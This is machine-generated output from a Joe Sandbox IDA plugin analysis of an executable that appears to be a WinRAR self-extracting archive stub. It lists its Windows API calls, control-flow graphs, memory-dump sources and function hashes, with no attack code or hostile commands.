                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0088BF6B
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0088BF85
                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,008BA472), ref: 0088BFA7
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0088C007
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088C01A
                                                                                                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0088C0BD
• EnableWindow.USER32(00000000,00000000), ref: 0088C197
• SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0088C1D9
  • Part of subcall function 0088C73F: __EH_prolog.LIBCMT ref: 0088C744
• SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0088C1FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l
• String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
• API String ID: 2472041962-2238251102
• Opcode ID: 0270b7d1c0f0452a78a4e96306145a46ab4fd4ec37ca96ce22530239467a62e7
• Instruction ID: 509c5de347b64c57190d3c01c47a7107a7635d52bfa0feeed8739786918270e2
• Opcode Fuzzy Hash: 0270b7d1c0f0452a78a4e96306145a46ab4fd4ec37ca96ce22530239467a62e7
• Instruction Fuzzy Hash: AA42D370944259BAEB21BBB89C4AFBE7B7CFB02700F044155F644E61D2CB759E44CB26

Control-flow Graph (edge list of the rendered graph; block ranges are virtual addresses)

control_flow_graph 267 880863-880886 call 88ec50 GetModuleHandleW 270 880888-88089f GetProcAddress 267->270 271 8808e7-880b48 267->271 274 8808b9-8808c9 GetProcAddress 270->274 275 8808a1-8808b7 270->275 272 880b4e-880b59 call 8975fb 271->272 273 880c14-880c40 GetModuleFileNameW call 87c29a call 880602 271->273 272->273 285 880b5f-880b8d GetModuleFileNameW CreateFileW 272->285 290 880c42-880c4e call 87b146 273->290 276 8808cb-8808e0 274->276 277 8808e5 274->277 275->274 276->277 277->271 287 880c08-880c0f CloseHandle 285->287 288 880b8f-880b9b SetFilePointer 285->288 287->273 288->287 291 880b9d-880bb9 ReadFile 288->291 297 880c7d-880ca4 call 87c310 GetFileAttributesW 290->297 298 880c50-880c5b call 88081b 290->298 291->287 293 880bbb-880be0 291->293 294 880bfd-880c06 call 880371 293->294 294->287 304 880be2-880bfc call 88081b 294->304 307 880cae 297->307 308 880ca6-880caa 297->308 298->297 306 880c5d-880c7b CompareStringW 298->306 304->294 306->297 306->308 311 880cb0-880cb5 307->311 308->290 310 880cac 308->310 310->311 312 880cec-880cee 311->312 313 880cb7 311->313 314 880dfb-880e05 312->314 315 880cf4-880d0b call 87c2e4 call 87b146 312->315 316 880cb9-880ce0 call 87c310 GetFileAttributesW 313->316 326 880d0d-880d6e call 88081b * 2 call 87e617 call 874092 call 87e617 call 88a7e4 315->326 327 880d73-880da6 call 874092 AllocConsole 315->327 322 880cea 316->322 323 880ce2-880ce6 316->323 322->312 323->316 325 880ce8 323->325 325->312 333 880df3-880df5 ExitProcess 326->333 332 880da8-880ded GetCurrentProcessId AttachConsole call 893e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->332 327->333 332->333
APIs
• GetModuleHandleW.KERNEL32(kernel32), ref: 0088087C
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0088088E
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008808BF
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00880B69
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00880B83
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00880B93
• ReadFile.KERNEL32(00000000,?,00007FFE,008A3C7C,00000000), ref: 00880BB1
• CloseHandle.KERNEL32(00000000), ref: 00880C09
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00880C1E
• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,008A3C7C,?,00000000,?,00000800), ref: 00880C72
• GetFileAttributesW.KERNELBASE(?,?,008A3C7C,00000800,?,00000000,?,00000800), ref: 00880C9C
• GetFileAttributesW.KERNEL32(?,?,008A3D44,00000800), ref: 00880CD8
  • Part of subcall function 0088081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00880836
  • Part of subcall function 0088081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087F2D8,Crypt32.dll,00000000,0087F35C,?,?,0087F33E,?,?,?), ref: 00880858
• _swprintf.LIBCMT ref: 00880D4A
• _swprintf.LIBCMT ref: 00880D96
  • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
• AllocConsole.KERNEL32 ref: 00880D9E
• GetCurrentProcessId.KERNEL32 ref: 00880DA8
• AttachConsole.KERNEL32(00000000), ref: 00880DAF
• _wcslen.LIBCMT ref: 00880DC4
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00880DD5
• WriteConsoleW.KERNEL32(00000000), ref: 00880DDC
• Sleep.KERNEL32(00002710), ref: 00880DE7
• FreeConsole.KERNEL32 ref: 00880DED
• ExitProcess.KERNEL32 ref: 00880DF5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
• API String ID: 1207345701-3298887752
• Opcode ID: 15a5f1247125ac8410cbf145735384f4df548cf94dd94650d508db06445b1350
• Instruction ID: 1ae19f3de4edeed235f244434f67b1b9478e4ab2662839c6b60d66a4ca90792c
• Opcode Fuzzy Hash: 15a5f1247125ac8410cbf145735384f4df548cf94dd94650d508db06445b1350
• Instruction Fuzzy Hash: 9CD163B1008784AFE761AF94C849B9FBAE8FB86704F50491DF289D6650DBB4864CCF52

Control-flow Graph (edge list of the rendered graph; block ranges are virtual addresses)

control_flow_graph 346 88c73f-88c757 call 88eb78 call 88ec50 351 88d40d-88d418 346->351 352 88c75d-88c787 call 88b314 346->352 352->351 355 88c78d-88c792 352->355 356 88c793-88c7a1 355->356 357 88c7a2-88c7b7 call 88af98 356->357 360 88c7b9 357->360 361 88c7bb-88c7d0 call 881fbb 360->361 364 88c7dd-88c7e0 361->364 365 88c7d2-88c7d6 361->365 367 88d3d9-88d404 call 88b314 364->367 368 88c7e6 364->368 365->361 366 88c7d8 365->366 366->367 367->356 379 88d40a-88d40c 367->379 369 88ca7c-88ca7e 368->369 370 88c7ed-88c7f0 368->370 371 88c9be-88c9c0 368->371 372 88ca5f-88ca61 368->372 369->367 375 88ca84-88ca8b 369->375 370->367 377 88c7f6-88c850 call 88a64d call 87bdf3 call 87a544 call 87a67e call 876edb 370->377 371->367 376 88c9c6-88c9d2 371->376 372->367 374 88ca67-88ca77 SetWindowTextW 372->374 374->367 375->367 380 88ca91-88caaa 375->380 381 88c9d4-88c9e5 call 897686 376->381 382 88c9e6-88c9eb 376->382 432 88c98f-88c9a4 call 87a5d1 377->432 379->351 384 88caac 380->384 385 88cab2-88cac0 call 893e13 380->385 381->382 388 88c9ed-88c9f3 382->388 389 88c9f5-88ca00 call 88b48e 382->389 384->385 385->367 402 88cac6-88cacf 385->402 393 88ca05-88ca07 388->393 389->393 398 88ca09-88ca10 call 893e13 393->398 399 88ca12-88ca32 call 893e13 call 893e3e 393->399 398->399 420 88ca4b-88ca4d 399->420 421 88ca34-88ca3b 399->421 406 88caf8-88cafb 402->406 407 88cad1-88cad5 402->407 409 88cbe0-88cbee call 880602 406->409 410 88cb01-88cb04 406->410 407->410 412 88cad7-88cadf 407->412 430 88cbf0-88cc04 call 89279b 409->430 414 88cb11-88cb2c 410->414 415 88cb06-88cb0b 410->415 412->367 418 88cae5-88caf3 call 880602 412->418 433 88cb2e-88cb68 414->433 434 88cb76-88cb7d 414->434 415->409 415->414 418->430 420->367 429 88ca53-88ca5a call 893e2e 420->429 427 88ca3d-88ca3f 421->427 428 88ca42-88ca4a call 897686 421->428 427->428 428->420 429->367 445 88cc11-88cc62 call 880602 call 88b1be GetDlgItem SetWindowTextW SendMessageW call 893e49 430->445 446 88cc06-88cc0a 430->446 450 88c9aa-88c9b9 call 87a55a 432->450 451 88c855-88c869 SetFileAttributesW 432->451 469 88cb6a 433->469 470 88cb6c-88cb6e 433->470 439 88cbab-88cbce call 893e13 * 2 434->439 440 88cb7f-88cb97 call 893e13 434->440 439->430 474 88cbd0-88cbde call 8805da 439->474 440->439 456 88cb99-88cba6 call 8805da 440->456 480 88cc67-88cc6b 445->480 446->445 452 88cc0c-88cc0e 446->452 450->367 458 88c90f-88c91f GetFileAttributesW 451->458 459 88c86f-88c8a2 call 87b991 call 87b690 call 893e13 451->459 452->445 456->439 458->432 467 88c921-88c930 DeleteFileW 458->467 489 88c8a4-88c8b3 call 893e13 459->489 490 88c8b5-88c8c3 call 87bdb4 459->490 467->432 473 88c932-88c935 467->473 469->470 470->434 477 88c939-88c965 call 874092 GetFileAttributesW 473->477 474->430 487 88c937-88c938 477->487 488 88c967-88c97d MoveFileW 477->488 480->367 484 88cc71-88cc85 SendMessageW 480->484 484->367 487->477 488->432 491 88c97f-88c989 MoveFileExW 488->491 489->490 496 88c8c9-88c908 call 893e13 call 88fff0 489->496 490->450 490->496 491->432 496->458
APIs
• __EH_prolog.LIBCMT ref: 0088C744
  • Part of subcall function 0088B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0088B3FB
• _wcslen.LIBCMT ref: 0088CA0A
• _wcslen.LIBCMT ref: 0088CA13
• SetWindowTextW.USER32(?,?), ref: 0088CA71
• _wcslen.LIBCMT ref: 0088CAB3
• _wcsrchr.LIBVCRUNTIME ref: 0088CBFB
• GetDlgItem.USER32(?,00000066), ref: 0088CC36
• SetWindowTextW.USER32(00000000,?), ref: 0088CC46
• SendMessageW.USER32(00000000,00000143,00000000,008BA472), ref: 0088CC54
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0088CC7F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
• String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
• API String ID: 2804936435-312220925
• Opcode ID: c8ea9dcf611f4b91eefaa78e272d309ed736a03df8100431339985a5bd19e64e
• Instruction ID: d21e8a8c610eff1135a51d8b73905ecc015aa98d2e334b33ec6d6a4cdc685fac
• Opcode Fuzzy Hash: c8ea9dcf611f4b91eefaa78e272d309ed736a03df8100431339985a5bd19e64e
• Instruction Fuzzy Hash: 4EE152B2900219AADF25EBA4DC85EEE77BCFB05310F4441A6F609E3145EB749F848B61
APIs
• __EH_prolog.LIBCMT ref: 0087DA70
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0087DAAC
  • Part of subcall function 0087C29A: _wcslen.LIBCMT ref: 0087C2A2
  • Part of subcall function 008805DA: _wcslen.LIBCMT ref: 008805E0
  • Part of subcall function 00881B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087BAE9,00000000,?,?,?,00010464), ref: 00881BA0
• _wcslen.LIBCMT ref: 0087DDE9
• __fprintf_l.LIBCMT ref: 0087DF1C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                                                                                    • API String ID: 566448164-801612888
                                                                                                                                                                                                    • Opcode ID: 106240e7afec856bd82b16c4ce5f110b727c3a245df1177866ac3b5d6003d629
                                                                                                                                                                                                    • Instruction ID: 2f2e8f1c8e3b726e692f5d5eae6e75f71bf1758721e0408ba9d8ab6f67a7d866
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 106240e7afec856bd82b16c4ce5f110b727c3a245df1177866ac3b5d6003d629
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6732F072900218ABDF25EF68C842AEE77B5FF19304F44815AF909E7285EBB1DD84CB51

                                                                                                                                                                                                    Control-flow Graph

APIs
  • Part of subcall function 0088B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088B579
  • Part of subcall function 0088B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B58A
  • Part of subcall function 0088B568: IsDialogMessageW.USER32(00010464,?), ref: 0088B59E
  • Part of subcall function 0088B568: TranslateMessage.USER32(?), ref: 0088B5AC
  • Part of subcall function 0088B568: DispatchMessageW.USER32(?), ref: 0088B5B6
• GetDlgItem.USER32(00000068,008CFCB8), ref: 0088D4E8
• ShowWindow.USER32(00000000,00000005,?,?,?,0088AF07,00000001,?,?,0088B7B9,008A506C,008CFCB8,008CFCB8,00001000,00000000,00000000), ref: 0088D510
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088D51B
• SendMessageW.USER32(00000000,000000C2,00000000,008A35F4), ref: 0088D529
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088D53F
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0088D559
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088D59D
• SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0088D5AB
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088D5BA
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088D5E1
• SendMessageW.USER32(00000000,000000C2,00000000,008A43F4), ref: 0088D5F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
• String ID: \
• API String ID: 3569833718-2967466578
• Opcode ID: 8378b224e46ea94a99be1e90886f3c56f5f80e8e0a273b9f08aef3860c6f4f3b
• Instruction ID: 911009197fa8272ba943fad7195ddf2e53ff0aad564eb3ce7e37475d7283c327
• Opcode Fuzzy Hash: 8378b224e46ea94a99be1e90886f3c56f5f80e8e0a273b9f08aef3860c6f4f3b
• Instruction Fuzzy Hash: 2331AF71146742BBE301EF249C4AFAB7FACFB86704F00061AF551D6291DB659A04C77B


Control-flow Graph

APIs
• _wcslen.LIBCMT ref: 0088D7AE
• ShellExecuteExW.SHELL32(?), ref: 0088D8DE
• IsWindowVisible.USER32(?), ref: 0088D911
• ShowWindow.USER32(?,00000000), ref: 0088D91D
• WaitForInputIdle.USER32(?,000007D0), ref: 0088D92E
• GetExitCodeProcess.KERNEL32(?,?), ref: 0088D959
• CloseHandle.KERNELBASE(?), ref: 0088D97F
• ShowWindow.USER32(?,00000001), ref: 0088D9E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
• String ID: .exe$.inf
• API String ID: 3646668279-3750412487
• Opcode ID: f0f3df0915f826a5b66e2596612a0613b336783a8837014f4e0e875d0244671f
• Instruction ID: 3fd07cbe0a12a9940add08b44f208e7a459daee1fc59f6cc87c10c5718cfd8ad
• Opcode Fuzzy Hash: f0f3df0915f826a5b66e2596612a0613b336783a8837014f4e0e875d0244671f
• Instruction Fuzzy Hash: 3D51BF715043849AEB31BB649844BABBBE5FF86744F04482EF9C4D71D1E7B08D85CB52

Control-flow Graph

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008957FB,008957FB,?,?,?,0089ABAC,00000001,00000001,2DE85006), ref: 0089A9B5
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0089ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0089AA3B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0089AB35
• __freea.LIBCMT ref: 0089AB42
  • Part of subcall function 00898E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
• __freea.LIBCMT ref: 0089AB4B
• __freea.LIBCMT ref: 0089AB70
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                    • Opcode ID: c9500f131da991f2771fbd1579f4285f183e01f08e89c7bfdd41b685248866b3
                                                                                                                                                                                                    • Instruction ID: 064a796a7b81375cb02f87ece65b209c8845e04f29edc6c7eb76ad0e08ff3a6e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9500f131da991f2771fbd1579f4285f183e01f08e89c7bfdd41b685248866b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68519372610216AFEF29AE68CC81EBFB7AAFB44760F194629FC05D6140DB34DC50C6D2

Control-flow Graph
control_flow_graph 972 88dc3b-88dc54 WaitForSingleObject 973 88dc9c-88dc9e 972->973 974 88dc56-88dc57 972->974 975 88dc59-88dc69 PeekMessageW 974->975 976 88dc6b-88dc86 GetMessageW TranslateMessage DispatchMessageW 975->976 977 88dc8c-88dc99 WaitForSingleObject 975->977 976->977 977->975 978 88dc9b 977->978 978->973
APIs
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 0088DC47
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088DC61
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088DC72
• TranslateMessage.USER32(?), ref: 0088DC7C
• DispatchMessageW.USER32(?), ref: 0088DC86
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 0088DC91
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Message$ObjectSingleWait$DispatchPeekTranslate
• String ID:
• API String ID: 2148572870-0
• Opcode ID: 2f07cd61a232db5fdc507b8099e5e36956f4499faee56c3448523e50db5600c0
• Instruction ID: 9f65daec99f68970dcaea75d88fae4d765bc23e03863b3400ebbe1cbab19cee6
• Opcode Fuzzy Hash: 2f07cd61a232db5fdc507b8099e5e36956f4499faee56c3448523e50db5600c0
• Instruction Fuzzy Hash: 88F04F72A01219BBCB206BA5EC4CECF7F7DFF42791B004122F50AD2050D674CA46CBA1

Control-flow Graph
control_flow_graph 979 893b72-893b7c 980 893bee-893bf1 979->980 981 893b7e-893b8c 980->981 982 893bf3 980->982 984 893b8e-893b91 981->984 985 893b95-893bb1 LoadLibraryExW 981->985 983 893bf5-893bf9 982->983 986 893c09-893c0b 984->986 987 893b93 984->987 988 893bfa-893c00 985->988 989 893bb3-893bbc GetLastError 985->989 986->983 991 893beb 987->991 988->986 990 893c02-893c03 FreeLibrary 988->990 992 893bbe-893bd3 call 896088 989->992 993 893be6-893be9 989->993 990->986 991->980 992->993 996 893bd5-893be4 LoadLibraryExW 992->996 993->991 996->988 996->993
APIs
• FreeLibrary.KERNEL32(00000000,?,?,00893C35,00000000,00000FA0,008D2088,00000000,?,00893D60,00000004,InitializeCriticalSectionEx,008A6394,InitializeCriticalSectionEx,00000000), ref: 00893C03
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: adc6c43fa27b6700b228dab648de9033b5181a9bc99dad4240c67fb037fcfc2c
• Instruction ID: 8c7966c6625ad86fc0c39224fdd68e6ea41a1937118dd8bda9e08dd109e881b7
• Opcode Fuzzy Hash: adc6c43fa27b6700b228dab648de9033b5181a9bc99dad4240c67fb037fcfc2c
• Instruction Fuzzy Hash: F3110632A05625ABDF32AB689C41B5937A4FF02774F2D0210F811FB290E770EF0086D1

Control-flow Graph
APIs
  • Part of subcall function 0088081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00880836
  • Part of subcall function 0088081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087F2D8,Crypt32.dll,00000000,0087F35C,?,?,0087F33E,?,?,?), ref: 00880858
• OleInitialize.OLE32(00000000), ref: 0088AC2F
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0088AC66
• SHGetMalloc.SHELL32(008B8438), ref: 0088AC70
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
• String ID: riched20.dll$3Ro
• API String ID: 3498096277-3613677438
• Opcode ID: 3af3703ed150e575c6d271418e139feb705290935c898121adaaddb77c0a7165
• Instruction ID: 7c929c62c1960805c813f35f0d4862c5c7c615622cbc2e4f8bf1c529918b857f
• Opcode Fuzzy Hash: 3af3703ed150e575c6d271418e139feb705290935c898121adaaddb77c0a7165
• Instruction Fuzzy Hash: 17F0F9B5900209ABCB10AFA9D8499EFFBFCFF84700F00416AA415E2241DBB856458FA2

Control-flow Graph
